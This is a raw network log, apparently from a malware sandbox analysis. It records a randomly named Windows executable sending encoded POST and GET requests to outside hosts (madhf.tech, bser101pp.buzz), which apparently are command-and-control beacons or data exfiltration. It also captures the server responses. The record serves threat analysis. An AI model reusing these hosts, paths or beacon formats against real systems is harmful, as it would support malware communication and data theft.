                                                                      Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.1149718103.224.182.242805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:51.869951010 CET634OUTPOST /6ou6/ HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.madhf.tech
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.madhf.tech/6ou6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 56 6a 48 36 36 33 38 31 75 4a 2f 4e 67 50 45 63 57 32 49 44 79 30 76 50 58 44 78 4b 35 67 65 30 45 4b 2f 36 7a 4d 78 52 75 72 43 39 47 37 68 33 74 46 6a 37 73 68 64 35 49 70 68 50 41 7a 52 51 37 69 2f 4c 66 6b 6b 4c 53 55 4c 4c 2b 78 49 49 50 64 67 6c 41 44 30 74 44 4d 32 53 69 7a 66 6d 33 57 36 43 34 52 4a 66 6a 43 74 4f 4c 4c 6b 47 59 7a 6a 76 74 4a 70 55 79 67 2f 69 52 4f 77 66 32 4d 50 6f 7a 38 50 65 30 6e 66 57 42 70 64 57 4f 38 58 31 65 31 65 6c 47 62 47 56 4d 2b 75 50 61 30 39 48 72 41 69 39 57 75 6f 46 69 38 3d
                                                                      Data Ascii: x2q=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWBpdWO8X1e1elGbGVM+uPa09HrAi9WuoFi8=
                                                                      Dec 10, 2024 15:15:53.097366095 CET871INHTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:52 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840152.4262799; expires=Fri, 08-Dec-2034 14:15:52 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-encoding: gzip
                                                                      content-length: 576
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close
                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                      Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.1149719103.224.182.242805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:54.526375055 CET1647OUTPOST /6ou6/ HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.madhf.tech
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.madhf.tech/6ou6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 54 37 48 6d 66 72 38 7a 4a 56 2f 4b 67 50 45 41 6d 32 7a 44 79 30 79 50 58 4c 31 4b 35 74 70 30 41 36 2f 37 53 73 78 51 66 72 43 75 6d 37 68 6f 64 46 69 32 4d 68 45 35 4c 52 74 50 45 76 52 51 37 69 2f 4c 5a 41 6b 50 47 41 4c 51 2b 78 4a 4c 50 63 68 75 67 44 49 74 41 38 49 53 6a 48 50 6d 45 4f 36 44 59 42 4a 61 52 61 74 4e 72 4c 69 48 59 7a 4e 76 74 56 32 55 79 73 4a 69 53 53 4b 66 30 4d 50 6f 33 41 57 61 33 72 72 4d 77 34 72 45 49 31 33 2b 63 4a 77 6d 47 33 67 52 65 2b 38 5a 75 73 50 50 4c 35 58 6c 47 79 76 54 69 43 6f 65 79 64 79 2b 35 6e 38 4d 39 49 68 4e 46 32 73 74 4a 71 31 6c 53 45 56 75 37 2f 39 6f 48 71 53 57 44 77 73 4a 65 48 4c 75 35 46 4f 36 41 38 31 50 4e 62 32 5a 75 4a 4c 56 43 61 78 74 6d 62 46 4d 6a 33 64 58 46 56 37 78 48 4a 33 66 45 2f 57 71 33 48 6a 45 54 66 45 55 72 71 44 73 44 49 30 75 52 71 61 70 59 35 41 47 49 47 50 33 73 51 4c 34 30 48 52 42 4e [TRUNCATED]
                                                                      Data Ascii: x2q=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eT7Hmfr8zJV/KgPEAm2zDy0yPXL1K5tp0A6/7SsxQfrCum7hodFi2MhE5LRtPEvRQ7i/LZAkPGALQ+xJLPchugDItA8ISjHPmEO6DYBJaRatNrLiHYzNvtV2UysJiSSKf0MPo3AWa3rrMw4rEI13+cJwmG3gRe+8ZusPPL5XlGyvTiCoeydy+5n8M9IhNF2stJq1lSEVu7/9oHqSWDwsJeHLu5FO6A81PNb2ZuJLVCaxtmbFMj3dXFV7xHJ3fE/Wq3HjETfEUrqDsDI0uRqapY5AGIGP3sQL40HRBNNsiZ6yhbpBX0Gx7uzC2izWsQWyH2SIHijcJ7ag2967fLnXPilx2oTd1NVCkytqTLiMe4tWrZpujoceN7mrNkZwVkFFTMmciEjBE3fcpJvN+/JUbQRJdpq6GzZDSb2fgS9mRp53lnmHxeIyfT2N3Ek1UDWQ5aQTKkE5EztxTcUDDUvs1+Fs9SBXzTLHC6negm6YTnpV2sOUYCL4s2JL5Ch3ovtp/fJ3Xmi/UHtQqC325vFg0tZ+dsLcSNX+RWATfYjCZa6I0e6TZqnZCRM2V5LFnyYBweaWfoE2hD07h6sIB/OACRF+EerUZe0BsdEPtTJI2uaTF3yCdgsofdgGPdDhqm2EJ8+VyMHZWZCULSJUeuXFBKdpgakXrBgcKpauSu3OHclCsty8PKUNpgbqfyRQsMxJv6qJXoJnsTrm98/kSpZpKGSnlaS8AiYOY1bIzOmWedxTLJSziVU8BecgeL+nvw8adf8WqYBy6Vb/2rA+GpGzCmFG/X3+frmwwNaIWs9uP1kkKT+24U88asr1t6zQhZtiMk5MWbDvF8Fcs5k5WklUY4tC7iQN2sqAG/rttAZxpc+WniOkEdtkF52Cz2wgFJh49b7xb3xI9RHvWQMj5Ykkudy/lQbN19IUE07DtnEClULIJqpMwiOjq7YieRFG3yDd82IaSgO3 [TRUNCATED]
                                                                      Dec 10, 2024 15:15:55.748228073 CET871INHTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:55 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840155.5395960; expires=Fri, 08-Dec-2034 14:15:55 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-encoding: gzip
                                                                      content-length: 576
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close
                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                      Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.1149720103.224.182.242805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:57.176817894 CET356OUTGET /6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY= HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:15:58.411070108 CET1236INHTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:58 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840158.7457317; expires=Fri, 08-Dec-2034 14:15:58 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-length: 1481
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 47 6e 36 44 3d 35 66 4e 4c 4e 38 71 68 71 42 33 50 26 78 32 71 3d 57 65 37 32 6b 32 55 38 52 71 79 48 4e 78 39 63 30 6c 67 72 63 4d 61 6a 50 2b 37 50 79 64 50 6e 43 61 75 30 35 4b 51 4d 55 6a 57 6d 71 37 33 49 7a 75 70 46 64 52 47 64 64 6e 6d 58 43 53 52 64 4d 55 72 6b 47 4b 64 51 30 41 48 59 38 6a 42 49 55 63 2f 74 75 41 7a 74 35 4e 4e 4d 36 50 42 32 79 4f 49 68 41 6c 37 2f 4c 62 2b 75 48 4e 34 34 4c 57 41 58 62 66 59 3d [TRUNCATED]
                                                                      Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" te
                                                                      Dec 10, 2024 15:15:58.411178112 CET517INData Raw: 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 47 6e 36
                                                                      Data Ascii: xt="#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY=&fp=-3'>Click here to


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.1149721104.21.64.1805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:04.026422977 CET626OUTPOST /v89f/ HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bser101pp.buzz
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bser101pp.buzz/v89f/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 51 61 45 52 37 58 6a 38 69 33 31 67 51 44 61 6a 45 7a 6b 68 38 53 48 68 59 45 59 68 2f 63 66 51 33 41 77 37 34 34 78 48 36 6a 65 7a 67 37 43 63 75 77 30 32 71 52 34 67 54 33 52 4e 6d 57 55 73 57 37 51 55 78 31 5a 45 32 59 6f 35 68 68 33 47 54 33 54 75 55 58 36 67 47 35 66 45 39 71 6d 59 48 7a 74 45 34 56 2b 64 48 34 6f 66 5a 71 69 5a 67 36 6e 7a 6f 44 2f 75 43 71 7a 4f 50 36 51 37 62 42 46 64 75 6b 68 55 4b 2b 64 57 4c 78 56 32 39 58 50 70 31 6c 78 64 70 66 2f 76 6b 6a 6d 6f 64 62 53 4a 58 44 71 55 5a 70 45 5a 41 4a 36 45 4d 6c 56 39 35 41 3d 3d
                                                                      Data Ascii: x2q=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp1lxdpf/vkjmodbSJXDqUZpEZAJ6EMlV95A==
                                                                      Dec 10, 2024 15:16:05.193217039 CET972INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:05 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e3k1jGkXHYr2mbcEMjdUKLdym47sePCCdWZsHt2B1U3UDex2h1PFiJQbB7LyYmJIg7Ge2C1JP8%2FemeCBnsMA9v1N7BwQFZrMZ699eNRkAsFjN0YAUUrovZYMLqlk%2BAXk9dRxiI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9c6dea04339-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=626&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.1149722104.21.64.1805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:06.802699089 CET646OUTPOST /v89f/ HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bser101pp.buzz
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bser101pp.buzz/v89f/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 4c 51 30 68 41 37 69 35 78 48 32 44 65 7a 34 4c 44 57 77 41 30 39 71 52 30 53 54 7a 52 4e 6d 57 41 73 57 35 59 55 77 43 4e 48 32 49 6f 37 74 42 33 41 4f 6e 54 75 55 58 36 67 47 35 4c 75 39 75 4b 59 48 44 64 45 71 67 43 63 63 59 6f 63 65 71 69 5a 33 71 6e 33 6f 44 2f 49 43 72 76 67 50 35 6f 37 62 41 31 64 75 51 56 4c 66 4f 64 63 50 78 55 6c 2b 6c 47 53 32 46 4d 41 68 4f 44 77 67 33 6d 4f 63 64 66 54 48 67 6a 44 61 36 4d 62 55 76 62 30 46 55 77 30 69 4e 48 70 74 30 43 67 62 75 4d 51 34 67 4c 32 66 67 57 38 50 68 41 3d
                                                                      Data Ascii: x2q=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6MbUvb0FUw0iNHpt0CgbuMQ4gL2fgW8PhA=
                                                                      Dec 10, 2024 15:16:07.990765095 CET972INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:07 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYQ7OLcAqachO2eLg4OMhNo8wSHrXFI%2BSE5ShEEY8xNNWoVq8jk4x%2Fc9EzmvpbS5Xz6a8xylG9u4O1TYcMeBHdB9wPDnWkrfkse3NuASIUW7U1MgAbmAquEDaOQxab3eb9bu4YE%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9d83fdf7277-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1954&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=646&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.1149723104.21.64.1805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:09.491715908 CET1659OUTPOST /v89f/ HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bser101pp.buzz
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bser101pp.buzz/v89f/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 54 51 30 54 49 37 34 61 5a 48 33 44 65 7a 31 72 44 56 77 41 30 67 71 56 59 73 54 7a 56 64 6d 55 34 73 58 63 4d 55 67 67 31 48 34 49 6f 37 77 78 33 42 54 33 53 73 55 58 71 73 47 35 62 75 39 75 4b 59 48 46 78 45 70 31 2b 63 62 6f 6f 66 5a 71 69 64 67 36 6e 54 6f 44 57 7a 43 71 62 65 50 4a 49 37 61 67 6c 64 31 46 68 4c 44 65 64 53 4b 78 56 69 2b 6c 61 4e 32 46 51 4d 68 4f 47 66 67 77 71 4f 66 59 69 57 43 52 50 49 4c 36 42 6d 52 73 4c 37 4a 47 45 77 6c 2f 72 39 68 56 4b 64 49 4b 6b 6e 2f 43 7a 38 50 54 44 33 62 30 36 6b 4a 65 41 6e 66 42 69 72 2f 69 58 76 46 4b 47 31 34 5a 75 51 69 38 50 4c 50 61 53 79 32 75 79 6e 48 61 71 55 70 32 45 41 38 64 75 43 30 68 41 39 61 64 6e 62 46 4c 42 66 65 51 67 6e 62 52 51 6c 6f 4c 46 41 58 73 78 39 71 49 75 58 35 33 53 4f 6a 47 47 67 4a 68 76 68 74 37 4a 36 37 68 4d 44 43 50 33 65 4c 4d 35 46 43 46 51 6f 6d 59 47 45 32 64 76 61 47 35 [TRUNCATED]
